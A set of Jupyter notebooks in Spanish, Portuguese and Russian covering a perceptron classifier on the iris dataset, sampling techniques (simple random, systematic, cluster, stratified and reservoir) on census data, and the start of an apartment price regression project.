La predicciรณn es la suma de las multiplicaciones de los atributos por los weights mรกs el bias (el bias lo deje como el primer elemento del array weights). Si el resultado es positivo predecimos con un 1, de lo contrario predecimos con un -1.
```
def predict(self, datum):
weights_without_bias = self.weights[1:self.number_of_weights]
attribute_values = datum[:self.number_of_weights-1]
weight_bias = self.weights[0]
activation = sum([i*j for i,j in zip(weights_without_bias,attribute_values)]) + weight_bias
return 1 if activation > 0 else -1
```
Ahora ยฟQuรฉ pasa si nuestra predicciรณn es incorrecta?, tenemos que ajustar los weights, te recuerdo las fรณrmulas:
$$w_0 = w_0 + clase * bias$$
$$w_n = w_n + clase * x_n$$
---
La w es el weight, la clase es -1 o 1, x es el atributo y el bias siempre es 1. Con clase nos referimos a la clase real, no a la predicciรณn.
```
def adjust_weights(self, real_class, datum):
self.weights[0] = self.weights[0] + real_class
for i in range(1,self.number_of_weights):
self.weights[i] = self.weights[i] + real_class * datum[i-1]
```
Puedes notar que el รบnico diferente es el bias, que lo que hacemos es simplemente sumarle la clase real. Los demรกs weights se calculan al sumarle la multiplicaciรณn de la clase real con el valor del atributo.
Ahora simplemente el entrenamiento consiste en hacer una predicciรณn, si รฉsta es correcta seguimos con lo siguientes datos, si es incorrecta ajustamos los weights.
```
def train(self, data, epochs):
for epoch in range(epochs):
print('Epoch {}'.format(epoch))
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
self.adjust_weights(real_class,datum)
print('Adjusted weights: {}'.format(self.weights))
print('Final weights from epoch {}: {}'.format(epoch,self.weights))
```
Te darรกs cuenta de que recibe un atributo epochs, el cual indica cuรกntas veces iterarรก la misma informaciรณn para ajustar cada vez mรกs los weights.
Por รบltimo, pero no menos importante, falta el mรฉtodo de verificaciรณn, quรฉ es exactamente lo mismo que en el entrenamiento, sรณlo que aquรญ ya no se ajustan los weights. El mรฉtodo regresarรก en porcentaje cuรกntas predicciones fueron correctas.
```
def verify(self, data):
count = 0
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
count = count + 1
return (1-count/len(data))*100
```
Pues ya quedรณ listo el perceptrรณn, ahora solo falta utilizarlo, creamos un perceptrรณn y le daremos como parรกmetros el nรบmero de weights (el cual es 5, porque son 4 atributos + bias), y las clases que hemos cargado, en mi caso yo estoy comparando iris-setosa e iris-versicolor.
```
perceptron = Perceptron(5, ['setosa', 'versicolor'])
```
Ahora lo entrenamos, le pasamos el set de datos de entrenamiento que obtuvimos antes y las รฉpocas (en mi caso lo dejarรฉ como 1). Cuando termine el mรฉtodo train los weights ya estarรกn ajustados, asรญ que podremos imprimirlos para ver cรณmo quedaron.
```
data_training = data_training.rename_axis('ID').values
print(data_training)
perceptron.train(data_training, epochs=1)
print('Final weights from training: {}'.format(perceptron.weights))
```
Ya que quedรณ entrenado!, ahora podemos verificar que tan buenos resultados nos dan estos weights, e imprimimos el error.
```
data_verification = data_verification.rename_axis('ID').values
print(data_verification)
accuracy = perceptron.verify(data_verification)
print('Error: {} %'.format(100-accuracy))
```
La predicciรณn del perceptrรณn te entregarรก un 1 o un -1, el cual estรก asociado a la clase, en mi caso, iris-setosa o iris-versicolor.
Ahora, necesito explicar que el perceptrรณn no siempre va a dar los mejores resultados, depende si son linealmente separables o no. Para darte una idea, aquรญ esta la grรกfica de sรณlo dos de los cuatro atributos de las especies. Puedes notar que la setosa y la versicolor son linealmente separables al igual que la setosa y la virginica. Pero la versicolor y la virginica NO son completamente separables, por lo general el perceptrรณn tendrรก unos cuantos errores.
```
sns.set_style("whitegrid")
sns.pairplot(iris,hue="species",size=3);
plt.show()
```
Intentemos con la otra combinaciรณn!

#Aquรญ sus cรณdigos!
```
perceptron2 = Perceptron(5, ['versicolor', 'virginica'])
data_with_two_species2 = iris.iloc[50:,:]
print(len(data_with_two_species2))
print(type(data_with_two_species2))
data_with_two_species2
from sklearn.utils import shuffle
data_with_two_species2 = shuffle(data_with_two_species2)
data_with_two_species2
data_training2 = data_with_two_species2.iloc[:90, :]
data_verification2 = data_with_two_species2.iloc[:-10, :]
data_training2 = data_training2.rename_axis('ID').values
print(data_training2)
data_verification2 = data_verification2.rename_axis('ID').values
print(data_verification2)
perceptron2.train(data_training2, epochs=1)
print('Final weights from training: {}'.format(perceptron2.weights))
accuracy2 = perceptron2.verify(data_verification2)
print('Error: {} %'.format(100-accuracy2))
```
|
github_jupyter
|
import numpy as np
class Perceptron:
"""Clasificador Perceptron basado en la descripciรณn del libro
"Python Machine Learning" de Sebastian Raschka.
Parametros
----------
eta: float
Tasa de aprendizaje.
n_iter: int
Pasadas sobre el dataset.
Atributos
---------
w_: array-1d
Pesos actualizados despuรฉs del ajuste
errors_: list
Cantidad de errores de clasificaciรณn en cada pasada
"""
def __init__(self, eta=0.1, n_iter=10):
self.eta = eta
self.n_iter = n_iter
def fit(self, X, y):
"""Ajustar datos de entrenamiento
Parรกmetros
----------
X: array like, forma = [n_samples, n_features]
Vectores de entrenamiento donde n_samples es el nรบmero de muestras y
n_features es el nรบmero de carรกcteristicas de cada muestra.
y: array-like, forma = [n_samples].
Valores de destino
Returns
-------
self: object
"""
self.w_ = np.zeros(1 + X.shape[1])
self.errors_ = []
for _ in range(self.n_iter):
errors = 0
for xi, target in zip(X, y):
update = self.eta * (target - self.predict(xi))
self.w_[1:] += update * xi
self.w_[0] += update
errors += int(update != 0.0)
self.errors_.append(errors)
return self
def predict(self, X):
"""Devolver clase usando funciรณn escalรณn de Heaviside.
phi(z) = 1 si z >= theta; -1 en otro caso
"""
phi = np.where(self.net_input(X) >= 0.0, 1, -1)
return phi
def net_input(self, X):
"""Calcular el valor z (net input)"""
# z = w ยท x + theta
z = np.dot(X, self.w_[1:]) + self.w_[0]
return z
import numpy as np
import pandas as pd
d = {'x': [0,0,1,1], 'y': [0,1,0,1], 'z': [0,0,0,1]}
df = pd.DataFrame(data=d)
df
from pylab import *
import matplotlib.pyplot as plt
x = df.x
y = df.y
color=['m','y','r','b']
fig = plt.figure()
ax = fig.add_subplot(111)
scatter(x,y,marker='o', c=color)
[ plot( [dot_x,dot_x] ,[0,dot_y], '-', linewidth = 3 ) for dot_x,dot_y in zip(x,y) ]
[ plot( [0,dot_x] ,[dot_y,dot_y], '-', linewidth = 3 ) for dot_x,dot_y in zip(x,y) ]
left,right = ax.get_xlim()
low,high = ax.get_ylim()
grid()
show()
#Ejemplo...
import numpy as np
np.random.random_sample(3).round(4)
x1 = 0
x2 = 0
y = 0
clase = -1
0.03 + (0.66)*x1 + (0.8)*x2
x1 = 0
x2 = 1
y = 0
clase = -1
-0.97 + (0.66)*x1 + (0.8)*x2
x1 = 1
x2 = 0
y = 0
clase = -1
print(-0.97 + (0.66)*x1 + (0.8)*x2)
x3 = 1
x4 = 1
y = 1
clase = 1
print(-0.97 + (0.66)*x3 + (0.8)*x4)
### Ejercicio con Python
import pandas as pd
import seaborn as sns
iris = sns.load_dataset('iris')
iris
import random
data_with_two_species = iris.iloc[:100,:]
print(len(data_with_two_species))
print(type(data_with_two_species))
data_with_two_species
from sklearn.utils import shuffle
data_with_two_species = shuffle(data_with_two_species)
data_with_two_species
data_training = data_with_two_species.iloc[:90, :]
data_verification = data_with_two_species.iloc[:-10, :]
class Perceptron:
def __init__(self, number_of_weights, classes):
self.number_of_weights = number_of_weights
self.weights = self.generate_random_weights(number_of_weights)
self.dict_classes = { classes[0]:1, classes[1]:-1 }
def generate_random_weights(self, n):
weights = []
for x in range(n):
weights.append(random.random()*10-5)
return weights
def predict(self, datum):
weights_without_bias = self.weights[1:self.number_of_weights]
attribute_values = datum[:self.number_of_weights-1]
weight_bias = self.weights[0]
activation = sum([i*j for i,j in zip(weights_without_bias,attribute_values)]) + weight_bias
return 1 if activation > 0 else -1
def adjust_weights(self, real_class, datum):
self.weights[0] = self.weights[0] + real_class
for i in range(1,self.number_of_weights):
self.weights[i] = self.weights[i] + real_class * datum[i-1]
def train(self, data, epochs):
for epoch in range(epochs):
print('Epoch {}'.format(epoch))
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
self.adjust_weights(real_class,datum)
print('Adjusted weights: {}'.format(self.weights))
print('Final weights from epoch {}: {}'.format(epoch,self.weights))
def verify(self, data):
count = 0
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
count = count + 1
return (1-count/len(data))*100
def generate_random_weights(self, n):
weights = []
for x in range(n):
weights.append(random.random()*10-5)
return weights
def predict(self, datum):
weights_without_bias = self.weights[1:self.number_of_weights]
attribute_values = datum[:self.number_of_weights-1]
weight_bias = self.weights[0]
activation = sum([i*j for i,j in zip(weights_without_bias,attribute_values)]) + weight_bias
return 1 if activation > 0 else -1
def adjust_weights(self, real_class, datum):
self.weights[0] = self.weights[0] + real_class
for i in range(1,self.number_of_weights):
self.weights[i] = self.weights[i] + real_class * datum[i-1]
def train(self, data, epochs):
for epoch in range(epochs):
print('Epoch {}'.format(epoch))
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
self.adjust_weights(real_class,datum)
print('Adjusted weights: {}'.format(self.weights))
print('Final weights from epoch {}: {}'.format(epoch,self.weights))
def verify(self, data):
count = 0
for datum in data:
real_class = self.dict_classes[datum[len(datum)-1]]
prediction_class = self.predict(datum)
if real_class != prediction_class:
count = count + 1
return (1-count/len(data))*100
perceptron = Perceptron(5, ['setosa', 'versicolor'])
data_training = data_training.rename_axis('ID').values
print(data_training)
perceptron.train(data_training, epochs=1)
print('Final weights from training: {}'.format(perceptron.weights))
data_verification = data_verification.rename_axis('ID').values
print(data_verification)
accuracy = perceptron.verify(data_verification)
print('Error: {} %'.format(100-accuracy))
sns.set_style("whitegrid")
sns.pairplot(iris,hue="species",size=3);
plt.show()
perceptron2 = Perceptron(5, ['versicolor', 'virginica'])
data_with_two_species2 = iris.iloc[50:,:]
print(len(data_with_two_species2))
print(type(data_with_two_species2))
data_with_two_species2
from sklearn.utils import shuffle
data_with_two_species2 = shuffle(data_with_two_species2)
data_with_two_species2
data_training2 = data_with_two_species2.iloc[:90, :]
data_verification2 = data_with_two_species2.iloc[:-10, :]
data_training2 = data_training2.rename_axis('ID').values
print(data_training2)
data_verification2 = data_verification2.rename_axis('ID').values
print(data_verification2)
perceptron2.train(data_training2, epochs=1)
print('Final weights from training: {}'.format(perceptron2.weights))
accuracy2 = perceptron2.verify(data_verification2)
print('Error: {} %'.format(100-accuracy2))
| 0.733356 | 0.97824 |
<a href="https://colab.research.google.com/github/AlexanderVieira/DataScience/blob/main/Amostragem.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# Amostragem
## Carregamento da base de dados
```
import pandas as pd
import random
import numpy as np
dataset = pd.read_csv('census.csv')
dataset.shape
dataset.head()
dataset.tail()
```
## Amostragem aleatรณria simples
```
df_amostra_aleatoria_simples = dataset.sample(n = 100, random_state = 1)
df_amostra_aleatoria_simples.shape
df_amostra_aleatoria_simples.head()
def amostragem_aleatoria_simples(dataset, amostras):
return dataset.sample(n = amostras, random_state=1)
df_amostra_aleatoria_simples = amostragem_aleatoria_simples(dataset, 100)
df_amostra_aleatoria_simples.shape
df_amostra_aleatoria_simples.head()
```
## Amostragem sistemรกtica
```
dataset.shape
len(dataset) // 100
random.seed(1)
random.randint(0, 325)
68 + 325
393 + 325
np.arange(68, len(dataset), step = 325)
def amostragem_sistematica(dataset, amostras):
intervalo = len(dataset) // amostras
random.seed(1)
inicio = random.randint(0, intervalo)
indices = np.arange(inicio, len(dataset), step = intervalo)
amostra_sistematica = dataset.iloc[indices]
return amostra_sistematica
df_amostra_sistematica = amostragem_sistematica(dataset, 100)
df_amostra_sistematica.shape
df_amostra_sistematica.head()
```
## Amostragem por grupos
```
len(dataset) / 10
grupos = []
id_grupo = 0
contagem = 0
for _ in dataset.iterrows():
grupos.append(id_grupo)
contagem += 1
if contagem > 3256:
contagem = 0
id_grupo += 1
print(grupos)
np.unique(grupos, return_counts=True)
np.shape(grupos), dataset.shape
dataset['grupo'] = grupos
dataset.head()
dataset.tail()
random.randint(0, 9)
df_agrupamento = dataset[dataset['grupo'] == 7]
df_agrupamento.shape
df_agrupamento['grupo'].value_counts()
def amostragem_agrupamento(dataset, numero_grupos):
intervalo = len(dataset) / numero_grupos
grupos = []
id_grupo = 0
contagem = 0
for _ in dataset.iterrows():
grupos.append(id_grupo)
contagem += 1
if contagem > intervalo:
contagem = 0
id_grupo += 1
dataset['grupo'] = grupos
random.seed(1)
grupo_selecionado = random.randint(0, numero_grupos)
return dataset[dataset['grupo'] == grupo_selecionado]
len(dataset) / 325
325 * 100
df_amostra_agrupamento = amostragem_agrupamento(dataset, 325)
df_amostra_agrupamento.shape, df_amostra_agrupamento['grupo'].value_counts()
df_amostra_agrupamento.head()
```
## Amostra estratificada
```
from sklearn.model_selection import StratifiedShuffleSplit
dataset['income'].value_counts()
7841 / len(dataset), 24720 / len(dataset)
0.2408095574460244 + 0.7591904425539756
100 / len(dataset)
split = StratifiedShuffleSplit(test_size=0.0030711587481956942)
for x, y in split.split(dataset, dataset['income']):
df_x = dataset.iloc[x]
df_y = dataset.iloc[y]
df_x.shape, df_y.shape
df_y.head()
df_y['income'].value_counts()
def amostragem_estratificada(dataset, percentual):
split = StratifiedShuffleSplit(test_size=percentual, random_state=1)
for _, y in split.split(dataset, dataset['income']):
df_y = dataset.iloc[y]
return df_y
df_amostra_estratificada = amostragem_estratificada(dataset, 0.0030711587481956942)
df_amostra_estratificada.shape
```
## Amostragem de reservatรณrio
```
stream = []
for i in range(len(dataset)):
stream.append(i)
print(stream)
def amostragem_reservatorio(dataset, amostras):
stream = []
for i in range(len(dataset)):
stream.append(i)
i = 0
tamanho = len(dataset)
reservatorio = [0] * amostras
for i in range(amostras):
reservatorio[i] = stream[i]
while i < tamanho:
j = random.randrange(i + 1)
if j < amostras:
reservatorio[j] = stream[i]
i += 1
return dataset.iloc[reservatorio]
df_amostragem_reservatorio = amostragem_reservatorio(dataset, 100)
df_amostragem_reservatorio.shape
df_amostragem_reservatorio.head()
```
## Comparativo dos resultados
```
dataset['age'].mean()
df_amostra_aleatoria_simples['age'].mean()
df_amostra_sistematica['age'].mean()
df_amostra_agrupamento['age'].mean()
df_amostra_estratificada['age'].mean()
df_amostragem_reservatorio['age'].mean()
```
|
github_jupyter
|
import pandas as pd
import random
import numpy as np
dataset = pd.read_csv('census.csv')
dataset.shape
dataset.head()
dataset.tail()
df_amostra_aleatoria_simples = dataset.sample(n = 100, random_state = 1)
df_amostra_aleatoria_simples.shape
df_amostra_aleatoria_simples.head()
def amostragem_aleatoria_simples(dataset, amostras):
return dataset.sample(n = amostras, random_state=1)
df_amostra_aleatoria_simples = amostragem_aleatoria_simples(dataset, 100)
df_amostra_aleatoria_simples.shape
df_amostra_aleatoria_simples.head()
dataset.shape
len(dataset) // 100
random.seed(1)
random.randint(0, 325)
68 + 325
393 + 325
np.arange(68, len(dataset), step = 325)
def amostragem_sistematica(dataset, amostras):
intervalo = len(dataset) // amostras
random.seed(1)
inicio = random.randint(0, intervalo)
indices = np.arange(inicio, len(dataset), step = intervalo)
amostra_sistematica = dataset.iloc[indices]
return amostra_sistematica
df_amostra_sistematica = amostragem_sistematica(dataset, 100)
df_amostra_sistematica.shape
df_amostra_sistematica.head()
len(dataset) / 10
grupos = []
id_grupo = 0
contagem = 0
for _ in dataset.iterrows():
grupos.append(id_grupo)
contagem += 1
if contagem > 3256:
contagem = 0
id_grupo += 1
print(grupos)
np.unique(grupos, return_counts=True)
np.shape(grupos), dataset.shape
dataset['grupo'] = grupos
dataset.head()
dataset.tail()
random.randint(0, 9)
df_agrupamento = dataset[dataset['grupo'] == 7]
df_agrupamento.shape
df_agrupamento['grupo'].value_counts()
def amostragem_agrupamento(dataset, numero_grupos):
intervalo = len(dataset) / numero_grupos
grupos = []
id_grupo = 0
contagem = 0
for _ in dataset.iterrows():
grupos.append(id_grupo)
contagem += 1
if contagem > intervalo:
contagem = 0
id_grupo += 1
dataset['grupo'] = grupos
random.seed(1)
grupo_selecionado = random.randint(0, numero_grupos)
return dataset[dataset['grupo'] == grupo_selecionado]
len(dataset) / 325
325 * 100
df_amostra_agrupamento = amostragem_agrupamento(dataset, 325)
df_amostra_agrupamento.shape, df_amostra_agrupamento['grupo'].value_counts()
df_amostra_agrupamento.head()
from sklearn.model_selection import StratifiedShuffleSplit
dataset['income'].value_counts()
7841 / len(dataset), 24720 / len(dataset)
0.2408095574460244 + 0.7591904425539756
100 / len(dataset)
split = StratifiedShuffleSplit(test_size=0.0030711587481956942)
for x, y in split.split(dataset, dataset['income']):
df_x = dataset.iloc[x]
df_y = dataset.iloc[y]
df_x.shape, df_y.shape
df_y.head()
df_y['income'].value_counts()
def amostragem_estratificada(dataset, percentual):
split = StratifiedShuffleSplit(test_size=percentual, random_state=1)
for _, y in split.split(dataset, dataset['income']):
df_y = dataset.iloc[y]
return df_y
df_amostra_estratificada = amostragem_estratificada(dataset, 0.0030711587481956942)
df_amostra_estratificada.shape
stream = []
for i in range(len(dataset)):
stream.append(i)
print(stream)
def amostragem_reservatorio(dataset, amostras):
stream = []
for i in range(len(dataset)):
stream.append(i)
i = 0
tamanho = len(dataset)
reservatorio = [0] * amostras
for i in range(amostras):
reservatorio[i] = stream[i]
while i < tamanho:
j = random.randrange(i + 1)
if j < amostras:
reservatorio[j] = stream[i]
i += 1
return dataset.iloc[reservatorio]
df_amostragem_reservatorio = amostragem_reservatorio(dataset, 100)
df_amostragem_reservatorio.shape
df_amostragem_reservatorio.head()
dataset['age'].mean()
df_amostra_aleatoria_simples['age'].mean()
df_amostra_sistematica['age'].mean()
df_amostra_agrupamento['age'].mean()
df_amostra_estratificada['age'].mean()
df_amostragem_reservatorio['age'].mean()
| 0.205416 | 0.901097 |
# Real Estate Price Prediction
### ะะฐะดะฐะฝะธะต ะดะปั ะบัััะพะฒะพะณะพ ะฟัะพะตะบัะฐ
ะะตััะธะบะฐ:
R2 - ะบะพัััะธัะธะตะฝั ะดะตัะตัะผะธะฝะฐัะธะธ (sklearn.metrics.r2_score)
ะะตะพะฑั
ะพะดะธะผะพ ะฟะพะปััะธัั R2 > 0.6 ะฝะฐ Private Leaderboard.
ะัะธะผะตัะฐะฝะธะต:
ะัะต ัะฐะนะปั csv ะดะพะปะถะฝั ัะพะดะตัะถะฐัั ะฝะฐะทะฒะฐะฝะธั ะฟะพะปะตะน (header - ัะพ ะตััั "ัะฐะฟะบั"),
ัะฐะทะดะตะปะธัะตะปั - ะทะฐะฟััะฐั. ะ ัะฐะนะปะฐั
ะฝะต ะดะพะปะถะฝั ัะพะดะตัะถะฐัััั ะธะฝะดะตะบัั ะธะท ะดะฐัะฐััะตะนะผะฐ.
____________
ะ ะตะบะพะผะตะฝะดะฐัะธะธ ะดะปั ัะฐะนะปะฐ ั ะบะพะดะพะผ (ipynb):
1. ะคะฐะนะป ะดะพะปะถะตะฝ ัะพะดะตัะถะฐัั ะทะฐะณะพะปะพะฒะบะธ ะธ ะบะพะผะผะตะฝัะฐัะธะธ
2. ะะพะฒัะพััััะธะตัั ะพะฟะตัะฐัะธะธ ะปัััะต ะพัะพัะผะปััั ะฒ ะฒะธะดะต ััะฝะบัะธะน
3. ะะพ ะฒะพะทะผะพะถะฝะพััะธ ะดะพะฑะฐะฒะปััั ะณัะฐัะธะบะธ, ะพะฟะธััะฒะฐััะธะต ะดะฐะฝะฝัะต (ะพะบะพะปะพ 3-5)
4. ะะพะฑะฐะฒะปััั ัะพะปัะบะพ ะปััััั ะผะพะดะตะปั, ัะพ ะตััั ะฝะต ะฒะบะปััะฐัั ะฒ ะบะพะด ะฒัะต ะฒะฐัะธะฐะฝัั ัะตัะตะฝะธั ะฟัะพะตะบัะฐ
5. ะกะบัะธะฟั ะฟัะพะตะบัะฐ ะดะพะปะถะตะฝ ะพััะฐะฑะฐััะฒะฐัั ะพั ะฝะฐัะฐะปะฐ ะธ ะดะพ ะบะพะฝัะฐ (ะพั ะทะฐะณััะทะบะธ ะดะฐะฝะฝัั
ะดะพ ะฒัะณััะทะบะธ ะฟัะตะดัะบะฐะทะฐะฝะธะน)
6. ะะตัั ะฟัะพะตะบั ะดะพะปะถะตะฝ ะฑััั ะฒ ะพะดะฝะพะผ ัะบัะธะฟัะต (ัะฐะนะป ipynb).
7. ะัะธ ะธัะฟะพะปัะทะพะฒะฐะฝะธะธ ััะฐัะธััะธะบ (ััะตะดะฝะตะต, ะผะตะดะธะฐะฝะฐ ะธ ั.ะด.) ะฒ ะบะฐัะตััะฒะต ะฟัะธะทะฝะฐะบะพะฒ, ะปัััะต ััะธัะฐัั ะธั
ะฝะฐ ััะตะนะฝะต, ะธ ะฟะพัะพะผ ะฝะฐ ะฒะฐะปะธะดะฐัะธะพะฝะฝัั
ะธ ัะตััะพะฒัั
ะดะฐะฝะฝัั
ะฝะต ััะธัะฐัั ััะฐัะธััะธะบะธ ะทะฐะฝะพะฒะพ, ะฐ ะฑัะฐัั ะธั
ั ััะตะนะฝะฐ.
8. ะัะพะตะบั ะดะพะปะถะตะฝ ะฟะพะปะฝะพัััั ะพััะฐะฑะฐััะฒะฐัั ะทะฐ ัะฐะทัะผะฝะพะต ะฒัะตะผั (ะฝะต ะฑะพะปััะต 10 ะผะธะฝัั), ะฟะพััะพะผั ะฒ ัะธะฝะฐะปัะฝัะน ะฒะฐัะธะฐะฝั ะปัััะต ะฝะต ะฒะบะปััะฐัั GridSearch ั ะฟะตัะตะฑะพัะพะผ ะฑะพะปััะพะณะพ ะบะพะปะธัะตััะฒะฐ ัะพัะตัะฐะฝะธะน ะฟะฐัะฐะผะตััะพะฒ.
**ะะปะฐะฝ ะทะฐะฝััะธั**
* [ะะฐะณััะทะบะฐ ะดะฐะฝะฝัั
](#load)
* [1. EDA](#eda)
* [2. ะะฑัะฐะฑะพัะบะฐ ะฒัะฑัะพัะพะฒ](#outlier)
* [3. ะะฑัะฐะฑะพัะบะฐ ะฟัะพะฟััะบะพะฒ](#nan)
* [4. ะะพัััะพะตะฝะธะต ะฝะพะฒัั
ะฟัะธะทะฝะฐะบะพะฒ](#feature)
* [5. ะัะฑะพั ะฟัะธะทะฝะฐะบะพะฒ](#feature_selection)
* [6. ะ ะฐะทะฑะธะตะฝะธะต ะฝะฐ train ะธ test](#split)
* [7. ะะพัััะพะตะฝะธะต ะผะพะดะตะปะธ](#modeling)
* [8. ะัะพะณะฝะพะทะธัะพะฒะฐะฝะธะต ะฝะฐ ัะตััะพะฒะพะผ ะดะฐัะฐัะตัะต](#prediction)
**ะะพะดะบะปััะตะฝะธะต ะฑะธะฑะปะธะพัะตะบ ะธ ัะบัะธะฟัะพะฒ**
```
import numpy as np
import pandas as pd
import random
from sklearn.model_selection import train_test_split, cross_val_score
from sklearn.preprocessing import StandardScaler, RobustScaler
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import r2_score as r2
from sklearn.model_selection import KFold, GridSearchCV
from datetime import datetime
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
import warnings
warnings.filterwarnings('ignore')
matplotlib.rcParams.update({'font.size': 14})
def evaluate_preds(train_true_values, train_pred_values, test_true_values, test_pred_values):
print("Train R2:\t" + str(round(r2(train_true_values, train_pred_values), 3)))
print("Test R2:\t" + str(round(r2(test_true_values, test_pred_values), 3)))
plt.figure(figsize=(18,10))
plt.subplot(121)
sns.scatterplot(x=train_pred_values, y=train_true_values)
plt.xlabel('Predicted values')
plt.ylabel('True values')
plt.title('Train sample prediction')
plt.subplot(122)
sns.scatterplot(x=test_pred_values, y=test_true_values)
plt.xlabel('Predicted values')
plt.ylabel('True values')
plt.title('Test sample prediction')
plt.show()
```
**ะััะธ ะบ ะดะธัะตะบัะพัะธัะผ ะธ ัะฐะนะปะฐะผ**
```
TRAIN_DATASET_PATH = 'train.csv'
TEST_DATASET_PATH = 'test.csv'
```
### ะะฐะณััะทะบะฐ ะดะฐะฝะฝัั
<a class='anchor' id='load'>
**ะะฟะธัะฐะฝะธะต ะฝะฐะฑะพัะฐ ะดะฐะฝะฝัั
**
* **Id** - ะธะดะตะฝัะธัะธะบะฐัะธะพะฝะฝัะน ะฝะพะผะตั ะบะฒะฐััะธัั
* **DistrictId** - ะธะดะตะฝัะธัะธะบะฐัะธะพะฝะฝัะน ะฝะพะผะตั ัะฐะนะพะฝะฐ
* **Rooms** - ะบะพะปะธัะตััะฒะพ ะบะพะผะฝะฐั
* **Square** - ะฟะปะพัะฐะดั
* **LifeSquare** - ะถะธะปะฐั ะฟะปะพัะฐะดั
* **KitchenSquare** - ะฟะปะพัะฐะดั ะบัั
ะฝะธ
* **Floor** - ััะฐะถ
* **HouseFloor** - ะบะพะปะธัะตััะฒะพ ััะฐะถะตะน ะฒ ะดะพะผะต
* **HouseYear** - ะณะพะด ะฟะพัััะพะนะบะธ ะดะพะผะฐ
* **Ecology_1, Ecology_2, Ecology_3** - ัะบะพะปะพะณะธัะตัะบะธะต ะฟะพะบะฐะทะฐัะตะปะธ ะผะตััะฝะพััะธ
* **Social_1, Social_2, Social_3** - ัะพัะธะฐะปัะฝัะต ะฟะพะบะฐะทะฐัะตะปะธ ะผะตััะฝะพััะธ
* **Healthcare_1, Helthcare_2** - ะฟะพะบะฐะทะฐัะตะปะธ ะผะตััะฝะพััะธ, ัะฒัะทะฐะฝะฝัะต ั ะพั
ัะฐะฝะพะน ะทะดะพัะพะฒัั
* **Shops_1, Shops_2** - ะฟะพะบะฐะทะฐัะตะปะธ, ัะฒัะทะฐะฝะฝัะต ั ะฝะฐะปะธัะธะตะผ ะผะฐะณะฐะทะธะฝะพะฒ, ัะพัะณะพะฒัั
ัะตะฝััะพะฒ
* **Price** - ัะตะฝะฐ ะบะฒะฐััะธัั
```
train_df = pd.read_csv(TRAIN_DATASET_PATH)
train_df.tail()
train_df.dtypes
test_df = pd.read_csv(TEST_DATASET_PATH)
test_df.tail()
print('ะกััะพะบ ะฒ ััะตะฝะธัะพะฒะพัะฝะพะผ ะฝะฐะฑะพัะต :\t', train_df.shape[0])
print('ะกััะพะบ ะฒ ัะตััะพะฒะพะผ ะฝะฐะฑะพัะต :\t', test_df.shape[0])
train_df.shape[1] - 1 == test_df.shape[1]
```
### ะัะธะฒะตะดะตะฝะธะต ัะธะฟะพะฒ
```
train_df.dtypes
```
>ะะพะปะต id ะธะดะตะฝัะธัะธะบะฐัะพั ะบะฒะฐััะธัั (ัะฝะธะบะฐะปัะฝัะน) ะธะฝัะพัะผะฐัะธะธ ะดะปั ะผะพะดะตะปะธ ะฝะต ะฝะตัะตั
```
train_df['Id'] = train_df['Id'].astype(str)
#train_df['DistrictId'] = train_df['DistrictId'].astype(str)
```
## 1. EDA <a class='anchor' id='eda'>
- ะะฝะฐะปะธะท ะดะฐะฝะฝัั
- ะัะฟัะฐะฒะปะตะฝะธั ะฒัะฑัะพัะพะฒ
- ะะฐะฟะพะปะฝะตะฝะธั NaN
- ะะดะตะน ะดะปั ะณะตะฝะตัะฐัะธะธ ะฝะพะฒัั
ัะธั
**ะฆะตะปะตะฒะฐั ะฟะตัะตะผะตะฝะฝะฐั**
```
train_df.Price.describe()
plt.figure(figsize = (16, 8))
train_df['Price'].hist(bins=30)
plt.ylabel('Count')
plt.xlabel('Price')
plt.title('Target distribution')
plt.show()
```
**ะะพะปะธัะตััะฒะตะฝะฝัะต ะฟะตัะตะผะตะฝะฝัะต**
```
train_df.describe()
```
**ะะพะผะธะฝะฐัะธะฒะฝัะต ะฟะตัะตะผะตะฝะฝัะต**
```
train_df.select_dtypes(include='object').columns.tolist()
train_df['DistrictId'].value_counts()
train_df['Ecology_2'].value_counts()
train_df['Ecology_3'].value_counts()
train_df['Shops_2'].value_counts()
```
### 2. ะะฑัะฐะฑะพัะบะฐ ะฒัะฑัะพัะพะฒ <a class='anchor' id='outlier'>
ะงัะพ ะผะพะถะฝะพ ะดะตะปะฐัั ั ะฝะธะผะธ?
1. ะัะบะธะฝััั ััะธ ะดะฐะฝะฝัะต (ัะพะปัะบะพ ะฝะฐ ััะตะนะฝะต, ะฝะฐ ัะตััะต ะฝะธัะตะณะพ ะฝะต ะฒัะบะธะดัะฒะฐะตะผ)
2. ะะฐะผะตะฝััั ะฒัะฑัะพัั ัะฐะทะฝัะผะธ ะผะตัะพะดะฐะผะธ (ะผะตะดะธะฐะฝั, ััะตะดะฝะธะต ะทะฝะฐัะตะฝะธั, np.clip ะธ ั.ะด.)
3. ะะตะปะฐัั/ะฝะต ะดะตะปะฐัั ะดะพะฟะพะปะฝะธัะตะปัะฝัั ัะธัั
4. ะะธัะตะณะพ ะฝะต ะดะตะปะฐัั
**Rooms**
```
train_df['Rooms'].value_counts()
```
>Rooms ะฟัะธะฝะธะผะฐะตะผ ะฒัะฑัะพัั ะบะฐะบ > 6 ะธ ะฟัะพะฟััะบะธ = 0
```
train_df[train_df['Rooms'] == 0]
train_df['Rooms_outlier'] = 0
train_df.loc[(train_df['Rooms'] == 0) | (train_df['Rooms'] >= 6), 'Rooms_outlier'] = 1
train_df.head()
train_df[train_df['Rooms'] > 6 ]
```
> ะบะพััะตะบัะธั Rooms
```
train_df.loc[train_df['Rooms'] == 0, 'Rooms'] = 1
train_df.loc[train_df['Rooms'] >= 6, 'Rooms'] = train_df['Rooms'].median()
train_df['Rooms'].value_counts()
```
**KitchenSquare**
```
train_df['KitchenSquare'].value_counts()
train_df['KitchenSquare'].quantile(.975), train_df['KitchenSquare'].quantile(.025)
```
